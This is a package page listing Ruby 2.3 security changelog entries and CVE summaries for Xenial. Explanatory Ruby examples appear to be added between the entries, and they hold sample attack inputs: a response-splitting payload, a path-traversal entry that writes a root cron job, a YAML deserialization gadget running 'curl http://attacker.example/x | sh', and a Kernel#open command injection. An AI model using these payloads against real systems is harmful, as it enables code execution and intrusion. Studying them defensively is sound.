UbuntuUpdates.org

Package "libruby2.3"

Name: libruby2.3

Description:

Libraries necessary to run Ruby 2.3

Latest version: 2.3.1-2~ubuntu16.04.16
Release: xenial (16.04)
Level: security
Repository: main
Head package: ruby2.3
Homepage: http://www.ruby-lang.org/

Other versions of "libruby2.3" in Xenial

Repository Area Version
base main 2.3.0-5ubuntu1
updates main 2.3.1-2~ubuntu16.04.16
PPA: Brightbox Ruby NG Experimental 2.3.8-4bbox1~xenial1

Changelog

Version: 2.3.1-2~16.04.10 2018-06-14 14:07:54 UTC

  ruby2.3 (2.3.1-2~16.04.10) xenial-security; urgency=medium

  * SECURITY UPDATE: Malicious format string - buffer overrun
    - debian/patches/CVE-2017-0898.patch: fix in sprintf.c,
      test/ruby/test_sprintf.rb.
    - CVE-2017-0898
  * SECURITY UPDATE: Response splitting attack
    - debian/patches/CVE-2017-17742.patch: fix in webrick/httpresponse.rb,
      test/webrick/test_httpresponse.rb.
    - CVE-2017-17742
  * SECURITY UPDATE: Denial of service
    - debian/patches/CVE-2018-8777*.patch: fix in lib/webrick/httpresponse.rb,
      lib/webrick/httpservlet/filehandler.rb,
      test/webrick/test_filehandler.rb, test/webrick/test_httpresponse.rb.
    - CVE-2018-8777

 -- <email address hidden> (Leonidas S. Barbosa) Fri, 08 Jun 2018 11:24:57 -0300

CVE-2017-0898 Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precision specifier (*) with a huge minus value. Such
CVE-2017-17742 Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1 allows an HTTP Response Splitting attack. An attac
CVE-2018-8777 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, an attacker can pass a large HTTP request with
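The response splitting entry above (CVE-2017-17742, fixed in WEBrick's httpresponse.rb) is easiest to see with a toy serializer. The following is an added example, not WEBrick's own code; the serializer, the HeaderInjection class and the helper names are hypothetical, and the Location value is a constructed attacker input.

```ruby
# Added illustration of the HTTP response splitting class fixed in WEBrick's
# httpresponse.rb (CVE-2017-17742). This is example code, not WEBrick's own
# implementation; the serializer and helper names are hypothetical.

class HeaderInjection < StandardError; end

# True unless some header name or value carries a bare CR or LF. HTTP/1.1
# never allows those inside a field, so rejecting them loses nothing.
def header_safe?(headers)
  headers.none? { |k, v| k.to_s.match?(/[\r\n]/) || v.to_s.match?(/[\r\n]/) }
end

# Naive serializer: copies header values into the wire format verbatim, so a
# value containing CRLF terminates the header block early and the rest of the
# value is parsed by the client as a second, attacker-authored response.
def naive_response(status, headers, body)
  lines = ["HTTP/1.1 #{status}"]
  headers.each { |k, v| lines << "#{k}: #{v}" }
  lines.join("\r\n") + "\r\n\r\n" + body
end

# Hardened serializer: refuse to emit anything if a header fails the check.
def safe_response(status, headers, body)
  raise HeaderInjection, "CR/LF in response header" unless header_safe?(headers)
  naive_response(status, headers, body)
end

# Number of status lines in a raw response; more than one means it was split.
def response_count(raw)
  raw.scan(%r{^HTTP/1\.1 \d{3}}).size
end

# Constructed attacker input: a redirect target taken from a query parameter
# and copied into Location without validation.
EVIL_LOCATION = "/home\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html\r\n" \
                "Content-Length: 25\r\n\r\n<script>alert(1)</script>"

if __FILE__ == $0
  raw = naive_response(302, { "Location" => EVIL_LOCATION }, "")
  puts "naive serializer produced #{response_count(raw)} responses"
  begin
    safe_response(302, { "Location" => EVIL_LOCATION }, "")
  rescue HeaderInjection => e
    puts "hardened serializer refused: #{e.message}"
  end
end
```

The check belongs at the point where a header value is set, before any byte of the response is written, so that a request that fails it is answered with an error rather than a partially written header block.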

Version: 2.3.1-2~16.04.9 2018-04-16 19:06:56 UTC

  ruby2.3 (2.3.1-2~16.04.9) xenial-security; urgency=medium

  * SECURITY UPDATE: Directory traversal vulnerability
    - debian/patches/CVE-2018-6914.patch: fix in lib/tmpdir.rb,
      test/test_tempfile.rb.
    - CVE-2018-6914
  * SECURITY UPDATE: Buffer under-read
    - debian/patches/CVE-2018-8778.patch: fix in pack.c,
      test/ruby/test_pack.rb.
    - CVE-2018-8778
  * SECURITY UPDATE: Unintended socket
    - debian/patches/CVE-2018-8779.patch: fix in ext/socket/unixsocket.c,
      test/socket/test_unix.rb.
    - CVE-2018-8779
  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-8780.patch: fix in dir.c,
      test/ruby/test_dir.rb.
    - CVE-2018-8780

 -- <email address hidden> (Leonidas S. Barbosa) Fri, 13 Apr 2018 11:38:20 -0300

CVE-2018-6914 Directory traversal vulnerability in the Dir.mktmpdir method in the tmpdir library in Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5
CVE-2018-8778 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, an attacker controlling the unpacking format (
CVE-2018-8779 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, the UNIXServer.open and UNIXSocket.open method
CVE-2018-8780 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, the Dir.open, Dir.new, Dir.entries and Dir.emp

Version: 2.3.1-2~16.04.7 2018-04-05 17:06:40 UTC

  ruby2.3 (2.3.1-2~16.04.7) xenial-security; urgency=medium

  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-1000073.patch: fix in
      lib/rubygems/package.rb.
    - CVE-2018-1000073
  * SECURITY UPDATE: Deserialization untrusted data
    - debian/patches/CVE-2018-1000074.patch: fix in
      lib/rubygems/commands/owner_command.rb,
      test/rubygems/test_gem_commands_owner_command.rb.
    - CVE-2018-1000074
  * SECURITY UPDATE: Infinite loop
    - debian/patches/CVE-2018-1000075.patch: fix in
      lib/rubygems/package/tar_header.rb,
      test/rubygems/test_gem_package_tar_header.rb.
    - CVE-2018-1000075
  * SECURITY UPDATE: Improper verification of crypto
    signature
    - debian/patches/CVE-2018-1000076.patch: fix in
      lib/rubygems/package.rb, lib/rubygems/package/tar_writer.rb,
      test/rubygems/test_gem_package.rb.
    - CVE-2018-1000076
  * SECURITY UPDATE: Validation vulnerability
    - debian/patches/CVE-2018-1000077.patch: fix in
      lib/rubygems/specification.rb,
      test/rubygems/test_gem_specification.rb.
    - CVE-2018-1000077
  * SECURITY UPDATE: Cross site scripting
    - debian/patches/CVE-2018-1000078.patch: fix in
      lib/rubygems/server.rb.
    - CVE-2018-1000078
  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-1000079.patch: fix in
      lib/rubygems/package.rb.
    - CVE-2018-1000079

 -- <email address hidden> (Leonidas S. Barbosa) Wed, 04 Apr 2018 12:16:06 -0300

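Three of the entries above are the same bug shape: a name supplied by an untrusted party is joined onto a directory the code thinks it controls, and the result lands somewhere else. That covers the RubyGems archive entries (CVE-2018-1000073 and CVE-2018-1000079, both in lib/rubygems/package.rb), the Dir.mktmpdir prefix (CVE-2018-6914 in the previous version) and the NUL-byte Dir.* issue (CVE-2018-8780). The block below is an added example of the containment check that closes that shape; it is not RubyGems' or the stdlib's own fix, the function names are hypothetical, and the archive contents are constructed.

```ruby
require "fileutils"
require "tmpdir"

# Added illustration of the path-containment check behind the directory
# traversal fixes listed on this page: archive entry names during gem
# installation (CVE-2018-1000073, CVE-2018-1000079) and the Dir.mktmpdir
# prefix (CVE-2018-6914). Example code, not RubyGems' or the stdlib's own
# fix; contained_path and extract_entries are hypothetical names.

class UnsafePath < StandardError; end

# Resolve `relative` against `root` and insist the result stays under root.
# Absolute names, ".." segments and embedded NUL bytes are all refused:
# those are the ingredients of the traversal payloads in the advisories.
def contained_path(root, relative)
  rel = relative.to_s
  raise UnsafePath, "NUL byte in #{rel.inspect}" if rel.include?("\0")
  root = File.expand_path(root)
  full = File.expand_path(rel, root)   # "/etc/x" or "../x" leave root here
  unless full == root || full.start_with?(root + File::SEPARATOR)
    raise UnsafePath, "#{rel.inspect} resolves outside #{root}"
  end
  full
end

def path_contained?(root, relative)
  contained_path(root, relative)
  true
rescue UnsafePath
  false
end

# Gem-style extraction: every entry must land under dest, otherwise abort
# before writing anything further.
def extract_entries(dest, entries)
  entries.map do |name, data|
    target = contained_path(dest, name)
    FileUtils.mkdir_p(File.dirname(target))
    File.binwrite(target, data)
    target
  end
end

# Constructed sample archive: one legitimate file, one traversal attempt.
SAMPLE_ENTRIES = {
  "lib/example.rb"           => "puts 'hello'\n",
  "../../../../etc/cron.d/x" => "* * * * * root id\n",
}

if __FILE__ == $0
  Dir.mktmpdir("gem-install") do |dest|
    begin
      extract_entries(dest, SAMPLE_ENTRIES)
    rescue UnsafePath => e
      puts "refused: #{e.message}"
    end
    written = Dir.glob(File.join(dest, "**", "*")).select { |f| File.file?(f) }
    puts "written: #{written.inspect}"
  end
  # The same check covers a tmpdir prefix: it must stay under Dir.tmpdir.
  puts "prefix escapes tmpdir? #{!path_contained?(Dir.tmpdir, '../../home/victim/.ssh')}"
end
```

Note that the check is on the lexically resolved path, not on the string: "lib/../lib/foo.rb" is accepted because it resolves inside root, while "/etc/passwd" is rejected even though it contains no "..". Symlinks already present under the destination are a separate problem that this check alone does not address.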

Version: 2.3.1-2~16.04.6 2018-01-31 15:07:35 UTC

  ruby2.3 (2.3.1-2~16.04.6) xenial-security; urgency=medium

  * SECURITY UPDATE: fails to validate specification names
    - debian/patches/CVE-2017-0901-0902.patch: fix this.
    - CVE-2017-0901
  * SECURITY UPDATE: vulnerable to a DNS hijacking
    - debian/patches/CVE-2017-0901-0902.patch: fix this.
    - CVE-2017-0902
  * SECURITY UPDATE: possible remote code execution
    - debian/patches/CVE-2017-0903.patch: whitelist classes
      and symbols that are in Gem spec YAML in lib/rubygems.rb,
      lib/rubygems/config_file.rb, lib/rubygems/package.rb,
      lib/rubygems/package/old.rb, lib/rubygems/safe_yaml.rb,
      lib/rubygems/specification.rb.
    - CVE-2017-0903

 -- <email address hidden> (Leonidas S. Barbosa) Tue, 30 Jan 2018 14:54:19 -0300

CVE-2017-0901 RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on th
CVE-2017-0902 RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to downlo
CVE-2017-0903 RubyGems versions between 2.0.0 and 2.6.13 are vulnerable to a possible remote code execution vulnerability. YAML deserialization of gem specificatio
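The CVE-2017-0903 entry above says the fix whitelists the classes and symbols allowed in a gem spec's YAML. The following added example shows why that matters: with the unrestricted Psych loader, a tagged node in the document picks the class to instantiate, and that class's init_with hook runs during parsing. This is not RubyGems' own SafeYAML code; the Hook class, the helper names and both YAML documents are constructed for the example.

```ruby
require "yaml"

# Added illustration of the YAML deserialization problem behind CVE-2017-0903:
# a gem specification is a YAML document, and loading it with the unrestricted
# loader lets the document name any Ruby class to instantiate. Example code,
# not RubyGems' own SafeYAML; Hook and the helper names are hypothetical.

# Stand-in for a gadget class: Psych calls init_with on a !ruby/object tagged
# node, so whatever this method does runs during parsing.
class Hook
  attr_reader :cmd
  def init_with(coder)
    @cmd = coder["cmd"]
    $hook_fired = @cmd   # a real gadget would spawn this instead of recording it
  end
end

# Constructed malicious spec
EVIL_SPEC = <<~YAML
  --- !ruby/object:Hook
  cmd: "curl http://attacker.example/x | sh"
YAML

# Constructed benign spec
GOOD_SPEC = <<~YAML
  name: example
  version: "1.0.0"
  authors:
    - Jane
YAML

# Unrestricted load. Psych.load was the unrestricted entry point until Psych 4
# (Ruby 3.1), where it became safe and unsafe_load took over that role.
def unsafe_load_spec(yaml)
  $hook_fired = nil
  Psych.respond_to?(:unsafe_load) ? Psych.unsafe_load(yaml) : Psych.load(yaml)
end

# Restricted load: plain scalars, arrays and hashes only; any tagged class
# not in permitted_classes raises Psych::DisallowedClass before instantiation.
def safe_load_spec(yaml)
  $hook_fired = nil
  Psych.safe_load(yaml, permitted_classes: [], aliases: false)
end

def safe_load_ok?(yaml)
  safe_load_spec(yaml)
  true
rescue Psych::DisallowedClass
  false
end

if __FILE__ == $0
  obj = unsafe_load_spec(EVIL_SPEC)
  puts "unrestricted loader built #{obj.class} and ran the hook: #{$hook_fired.inspect}"
  puts "restricted loader accepts the malicious spec? #{safe_load_ok?(EVIL_SPEC)}"
  puts "restricted loader on a benign spec: #{safe_load_spec(GOOD_SPEC).inspect}"
end
```

A real gemspec loader has to permit a handful of classes (Gem::Specification, Gem::Version, Gem::Requirement and so on), so the practical form of the fix is a short explicit permitted_classes list rather than the empty one used here.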

Version: 2.3.1-2~16.04.5 2018-01-10 15:07:04 UTC

  ruby2.3 (2.3.1-2~16.04.5) xenial-security; urgency=medium

  * SECURITY UPDATE: possible command injection attacks through
    Kernel#open
    - debian/patches/CVE-2017-17790.patch: fix uses of Kernel#open in
      lib/resolv.rb.
    - CVE-2017-17790
  * SECURITY UPDATE: possibly execute arbitrary commands via a crafted user name
    - debian/patches/CVE-2017-10784.patch: sanitize any type of logs in
      lib/webrick/httpstatus.rb, lib/webrick/log.rb and test/webrick/test_httpauth.rb.
    - CVE-2017-10784
  * SECURITY UPDATE: denial of service via a crafted string
    - debian/patches/CVE-2017-14033.patch: fix in ext/openssl/ossl_asn1.c.
    - CVE-2017-14033
  * SECURITY UPDATE: Arbitrary memory expose during a JSON.generate call
    - debian/patches/CVE-2017-14064.patch: fix this in
      ext/json/ext/generator/generator.c and ext/json/ext/generator/generator.h.

 -- <email address hidden> (Leonidas S. Barbosa) Tue, 09 Jan 2018 11:43:22 -0300

CVE-2017-17790 The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which might allow Command Injection attacks, as demonstrated by
CVE-2017-10784 The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject
CVE-2017-14033 The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of
CVE-2017-14064 Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using st
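The CVE-2017-17790 entry above (Kernel#open in lib/resolv.rb) is a Ruby-specific pitfall worth seeing concretely: Kernel#open interprets a leading "|" as a command to spawn, so any code that passes an externally influenced path to it is a command injection. The block below is an added example, not resolv.rb itself; the reader functions are hypothetical and the injected value is constructed.

```ruby
require "tempfile"

# Added illustration of the Kernel#open command injection class fixed in
# lib/resolv.rb (CVE-2017-17790). Example code, not resolv.rb itself; the
# reader functions and the constructed input are hypothetical.

# Vulnerable reader: Kernel#open treats a leading "|" as "spawn this command
# and hand me its stdout", so an attacker who controls the path runs commands.
def read_hosts_unsafe(path)
  open(path) { |io| io.read }
end

# Fixed reader: File.open only opens files; "|id" is merely an odd filename.
def read_hosts_safe(path)
  File.open(path, "r") { |io| io.read }
end

# True if the safe reader refuses the input as a nonexistent file.
def safe_reader_rejects?(path)
  read_hosts_safe(path)
  false
rescue Errno::ENOENT
  true
end

# Constructed attacker-controlled value, e.g. a hosts-file path that reaches
# the resolver from configuration without validation.
INJECTED = "|echo pwned"

if __FILE__ == $0
  puts "Kernel#open on #{INJECTED.inspect} returned: #{read_hosts_unsafe(INJECTED).inspect}"
  puts "File.open on the same input raises ENOENT: #{safe_reader_rejects?(INJECTED)}"
  Tempfile.create("hosts") do |f|
    f.write("127.0.0.1 localhost\n")
    f.flush
    puts "both readers agree on a real file: #{read_hosts_unsafe(f.path) == read_hosts_safe(f.path)}"
  end
end
```

The same substitution (File.open, or IO.popen with an explicit argument array when a subprocess is actually wanted) is the right fix anywhere a path comes from configuration, the environment or a request rather than from a literal in the source.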


